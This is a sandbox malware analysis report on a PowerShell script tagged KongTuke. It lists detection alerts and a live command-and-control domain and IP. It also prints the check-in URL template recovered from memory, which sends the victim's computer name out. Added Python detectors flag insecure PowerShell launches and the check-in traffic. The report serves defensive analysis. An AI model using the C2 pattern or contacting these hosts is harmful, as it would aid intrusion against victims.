
Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1580819
MD5: 8d7677123f246bb6bfaf3e54501aa93d
SHA1: a2087790c0105e329964e38e776da360ce38fc3e
SHA256: ff7bc609b58de655c7e0b5ffb9c4a7adce64a8cf24bb131573b1def9ca66db84
Tags: KongTuke, ps1, user-monitorsg

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6672, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6672, ProcessName: powershell.exe
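Both Sigma matches above fire on the command line alone: a PowerShell host started with -ExecutionPolicy unrestricted and a script under the user's profile. The following is an added example (Python, written for this page; it is neither the Sigma rule text nor code from the report) that applies the same logic to process-creation events. Field names follow Sysmon event 1, the sample events are constructed, and the handling of abbreviated switches (-ep, -ex, -exec, -f) is an assumption based on powershell.exe matching parameter names by unambiguous prefix.

```python
"""Flag PowerShell started with an insecure execution policy.

Added example (Python): not the Sigma rule text and not code from the report.
Field names follow Sysmon event 1; the sample events are constructed; the
abbreviated-switch handling (-ep, -ex, -exec, -f) is an assumption based on
powershell.exe matching parameter names by unambiguous prefix.
"""
import ntpath
import shlex
from typing import Optional

INSECURE_POLICIES = {"unrestricted", "bypass"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Locations a standard user can write to; the report's script ran from
# C:\Users\user\Desktop, which is the pattern worth escalating.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def _switch_name(token: str) -> Optional[str]:
    """Lower-cased switch name if the token is a -switch or /switch, else None."""
    if token.startswith(("-", "/")) and len(token) > 1:
        return token[1:].lower()
    return None


def _is_policy_switch(token: str) -> bool:
    name = _switch_name(token)
    # -ep is an explicit alias; any prefix of two or more characters is accepted (-ex, -exec, ...)
    return name is not None and (name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name)))


def _is_file_switch(token: str) -> bool:
    name = _switch_name(token)
    return name is not None and "file".startswith(name)


def _unquote(token: str) -> str:
    return token[1:-1] if len(token) >= 2 and token[0] == token[-1] == '"' else token


def check_process_event(event: dict) -> Optional[dict]:
    """Return a finding when a PowerShell host was launched with Unrestricted or Bypass."""
    if ntpath.basename(event.get("Image", "")).lower() not in POWERSHELL_IMAGES:
        return None
    # posix=False keeps backslashes literal and quoted Windows paths as one token
    tokens = [_unquote(t) for t in shlex.split(event["CommandLine"], posix=False)]
    policy = script = None
    for i, tok in enumerate(tokens[:-1]):
        if _is_policy_switch(tok):
            policy = tokens[i + 1].lower()
        elif _is_file_switch(tok):
            script = tokens[i + 1]
    if policy not in INSECURE_POLICIES:
        return None
    return {
        "ProcessId": event.get("ProcessId"),
        "policy": policy,
        "script": script,
        "script_user_writable": bool(script) and script.lower().startswith(USER_WRITABLE_PREFIXES),
        "parent": event.get("ParentImage") or "<unknown>",
    }


def run_checks(events) -> list:
    return [f for f in map(check_process_event, events) if f]


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; the first reproduces the command line from this report.
SAMPLE_EVENTS = [
    {"ProcessId": 6672, "Image": PS_IMAGE, "ParentImage": "",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"'},
    {"ProcessId": 7001, "Image": PS_IMAGE, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Program Files\Contoso\maint.ps1"'},
    {"ProcessId": 7002, "Image": PS_IMAGE, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -ep bypass -w hidden -f C:\ProgramData\u.ps1"},
    {"ProcessId": 7003, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe -ExecutionPolicy bypass"},
]

if __name__ == "__main__":
    for finding in run_checks(SAMPLE_EVENTS):
        print(finding)
```

The RemoteSigned launch from a service and the non-PowerShell image produce no finding; the report's command line and the abbreviated `-ep bypass -f` form both do, with the script path marked as user-writable so a triage rule can weight it above an administrator's Unrestricted run from Program Files.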
Timestamp                       | SID     | Severity | Classtype                            | Source IP   | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T10:02:00.603527+0100 | 2057741 | 1        | A Network Trojan was detected        | 192.168.2.6 | 49699       | 45.61.136.138  | 80               | TCP
2024-12-26T10:01:58.643168+0100 | 2859405 | 1        | Domain Observed Used for C2 Detected | 192.168.2.6 | 51603       | 1.1.1.1        | 53               | UDP
2024-12-26T10:02:00.603527+0100 | 1810000 | 1        | Potentially Bad Traffic              | 192.168.2.6 | 49699       | 45.61.136.138  | 80               | TCP
2024-12-26T10:02:02.718194+0100 | 1810000 | 1        | Potentially Bad Traffic              | 192.168.2.6 | 49700       | 142.250.181.68 | 80               | TCP


AV Detection

Source: http://gajaechkfhfghal.top; Avira URL Cloud: Label: malware
Source: http://gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527; Avira URL Cloud: Label: malware
Source: download.ps1; Virustotal: Detection: 11%
Source: download.ps1; ReversingLabs: Detection: 15%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 81.6% probability
Source: Binary string: mscorlib.pdba source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdll source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbw7Z source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft

Networking

Source: Network traffic; Suricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.6:51603 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49700 -> 142.250.181.68:80
Source: Network traffic; Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49699 -> 45.61.136.138:80
Source: Network traffic; Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.6:49699 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; HTTP traffic: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 45.61.136.138
Source: global traffic; HTTP traffic detected: GET /w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: gajaechkfhfghal.top | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
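The check-in seen on the wire is the expansion of a template the report later recovers from powershell.exe memory, http://$tcbm1lixhefpkn0/$9rkis8hejvfl3c4.php?id=$env:computername&key=$bhwpnfx&s=527: a randomised host and script name, the victim's computer name in id, a numeric key, and a fixed s=527, all sent with the stock WindowsPowerShell/5.1 User-Agent that the Suricata anomaly rule keys on. The following is an added example (Python, written for this page; not code from the report or from the sample) that separates that check-in from the script's plain GET / to www.google.com and from other PowerShell-originated HTTP in a proxy log. The log layout, the helper names, the connectivity allowlist, the 8-character floor on the script name and the sample lines are all constructed for the example.

```python
"""Spot the PowerShell check-in pattern from this report in proxy logs.

Added example (Python): not code from the report and not the sample's own code.
The log layout, helper names, allowlist and sample lines are constructed. The
request shape and User-Agent come from the report, where the script expands
    http://$host/$name.php?id=$env:computername&key=$key&s=527
and sends it with the stock WindowsPowerShell/5.1 User-Agent.
"""
import re
from urllib.parse import parse_qs, urlsplit

POWERSHELL_UA = re.compile(r"\bWindowsPowerShell/\d", re.I)
# Randomised script name ending in .php; the 8-character floor is an assumption.
CHECKIN_PATH = re.compile(r"^/[a-z0-9]{8,}\.php$", re.I)
CHECKIN_PARAMS = {"id", "key", "s"}
# Assumption: hosts the script touches only as a reachability probe (GET /).
CONNECTIVITY_HOSTS = {"www.google.com"}

LOG_FIELDS = ("ts", "src", "dst", "method", "host", "uri", "user_agent")


def parse_log_line(line: str) -> dict:
    """Constructed tab-separated proxy log line -> record."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != len(LOG_FIELDS):
        raise ValueError(f"expected {len(LOG_FIELDS)} fields, got {len(fields)}")
    return dict(zip(LOG_FIELDS, fields))


def classify(rec: dict):
    """Return a finding for PowerShell-originated HTTP, or None for other clients."""
    if not POWERSHELL_UA.search(rec["user_agent"]):
        return None
    parts = urlsplit(rec["uri"])
    qs = parse_qs(parts.query)
    base = {k: rec[k] for k in ("ts", "src", "dst", "host")}
    if CHECKIN_PATH.match(parts.path) and CHECKIN_PARAMS <= set(qs):
        return {**base, "verdict": "c2_checkin",
                "victim_id": qs["id"][0], "key": qs["key"][0], "s": qs["s"][0]}
    if rec["host"] in CONNECTIVITY_HOSTS and parts.path == "/":
        return {**base, "verdict": "connectivity_check"}
    return {**base, "verdict": "powershell_http"}


def scan(lines):
    findings = []
    for line in lines:
        if line.strip():
            finding = classify(parse_log_line(line))
            if finding:
                findings.append(finding)
    return findings


PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
# Constructed sample log; the first two lines mirror the two requests in the report.
SAMPLE_LOG = ["\t".join(r) for r in (
    ("2024-12-26T10:02:00+0100", "192.168.2.6", "45.61.136.138", "GET", "gajaechkfhfghal.top",
     "/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527", PS_UA),
    ("2024-12-26T10:02:02+0100", "192.168.2.6", "142.250.181.68", "GET", "www.google.com", "/", PS_UA),
    ("2024-12-26T10:05:00+0100", "192.168.2.9", "10.0.0.20", "GET", "intranet.example",
     "/scripts/inventory.ps1", PS_UA),
    ("2024-12-26T10:06:00+0100", "192.168.2.9", "203.0.113.5", "GET", "shop.example",
     "/cart.php?id=42&key=abc&s=1", BROWSER_UA),
)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The browser request with the same three query parameters is ignored because the User-Agent gate comes first; everything with a PowerShell User-Agent is kept so that a later pivot on src still has the connectivity probe and the internal script fetch next to the check-in.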
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$tcbm1lixhefpkn0/$9rkis8hejvfl3c4.php?id=$env:computername&key=$bhwpnfx&s=527
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2264659089.00000111FA277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mf-
Source: powershell.exe, 00000000.00000002.2264488304.00000111FA0D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.2217128894.00000111E363D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.2217128894.00000111E363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2217128894.00000111E1FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2217128894.00000111E1FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F201C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F201C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2217128894.00000111E39CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E44A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024
Source: powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C88520_2_00007FFD348C8852
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C7AA60_2_00007FFD348C7AA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B75FA0_2_00007FFD348B75FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348BB6480_2_00007FFD348BB648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B77270_2_00007FFD348B7727
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B4FF30_2_00007FFD348B4FF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B38030_2_00007FFD348B3803
